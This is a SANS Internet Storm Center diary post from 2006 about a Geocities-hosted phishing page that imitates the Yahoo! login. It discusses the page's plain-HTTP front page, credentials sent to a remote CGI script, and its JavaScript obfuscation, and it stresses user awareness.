Threat Level: green Handler on Duty: Johannes Ullrich

SANS ISC: Yahoo! user account phishing - SANS Internet Storm Center SANS ISC InfoSec Forums

Watch ISC TV. Great for NOCs, SOCs and Living Rooms:

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Yahoo! user account phishing

One of our readers, Bill, recently sent us some information about a fairly decent phishing web site.
The web site, which you can see below, is actually hosted on Geocities. The URL will immediately alert any user that knows what he's looking for (and this is why we can not stress enough how important user awareness and education is).
As you can see below, the design is fairly good, and if you don't check the URL, you might be fooled into entering your credentials here.

There are couple of issues here about which we wrote recently ( While we were looking at bank web sites in the original diary by Johannes, we have a similar problem here. Although the credentials are transferred over the network securely (using SSL), the front web page seems to be plain HTTP.
A typical user doesn't know how to check what's happening once he clicks on the "Login" button, so it's very easy to launch phishing attacks like this on them.
That's why you should always use SSL on the front web page at least (yes, there are other numerous attacks on this, but let's stick to this subject for this moment).

Back to the phishing web page. Once a user tries to log in, his credentials are sent to a CGI script on a remote site which then (probably) e-mails this to the attacker.
The last interesting thing is related to obfuscation of the HTML. The attacker decided to use a product called HTML Protector. This tool basically just obfuscates HTML code using JavaScript but as a browser needs to be able to parse the HTML code, the unobfuscation function always has to be present, so with some spare time you can easily unobfuscate this.

I will be teaching next: Web App Penetration Testing and Ethical Hacking - SANS Pen Test Hackfest Europe 2022 - Berlin


403 Posts
ISC Handler
Jul 6th 2006

Sign Up for Free or Log In to start participating in the conversation!